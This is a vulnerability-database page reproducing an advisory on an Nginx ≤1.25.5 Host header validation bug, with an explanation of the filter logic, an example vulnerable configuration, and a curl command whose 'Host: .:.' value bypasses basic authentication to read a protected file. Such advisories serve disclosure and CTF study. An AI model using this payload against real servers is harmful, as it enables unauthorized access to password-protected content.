Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDhteamPACKETSTORM:178250
HistoryApr 24, 2024 - 12:00 a.m.

Nginx 1.25.5 Host Header Validation

2024-04-2400:00:00
dhteam
packetstormsecurity.com
196
nginx
host header validation
security bug
filter
vulnerable configuration
exploit
unauthorized access

7.4 High

AI Score

Confidence

Low

JSON
`# Nginx =< 1.25.5 $host variable validation bug  
  
## Intro:  
  
In the "Host" header sent to Nginx web server you can't just insert a dot or something like that, because a filtering rules exists there.   
The ngx_http_validate_host function is responsible for filtering (https://github.com/nginx/nginx/blob/master/src/http/ngx_http_request.c#L2145).  
  
## What it validates:  
  
+ two dots in a row are not allowed  
+ colon and everything after it are stripped off  
+ if "Host" header starts with "[", then after "]" everything is deleted  
+ path separators are not allowed  
+ cannot send chars ≤ 0x20 and == 0x7f  
+ if there is a dot at the end, it is removed  
+ if after all deletions the host length is zero, error occurs  
  
## The bug itself:   
  
dot_pos can be greater than host_len, if the last dot is included in the strip, then the last unstripped character (first dot in this case) is not deleted.  
  
So, if "Host" header payload is .:. , the colon and dot after it are stripped, but the first dot remains untouched and Nginx $host variable now contains only single dot character, what can't be done in the normal conditions.  
  
## Vulnerable Nginx server configuration example:  
  
server {  
root /sites/$host;  
index index.html;  
server_name _;  
  
location / {  
try_files $uri $uri/ =404;  
}  
}  
  
server {  
server_name "";  
  
location / {  
return 418 "I'm a teapot.";  
}  
}  
  
server {  
root /sites/protected-host.example.com;  
index flag.html;  
server_name protected-host.example.com;  
auth_basic "Protected File Storage";  
auth_basic_user_file /.htpasswd;  
  
location / {  
try_files $uri $uri/ =404;  
}  
}  
  
## Exploit (unauthorized access to password-protected host in this case):  
  
curl -H "Host: .:." http://protected-host.example.com/protected-host.example.com/flag.html  
  
P.S.  
The bug was sent to [email protected], but the Nginx dev team said that ngx_http_validate_host function is a filter against fools and not a security bug at all, so it was decided to make it as a task on CTF Tinkoff contest.  
  
  
  
`

7.4 High

AI Score

Confidence

Low

JSON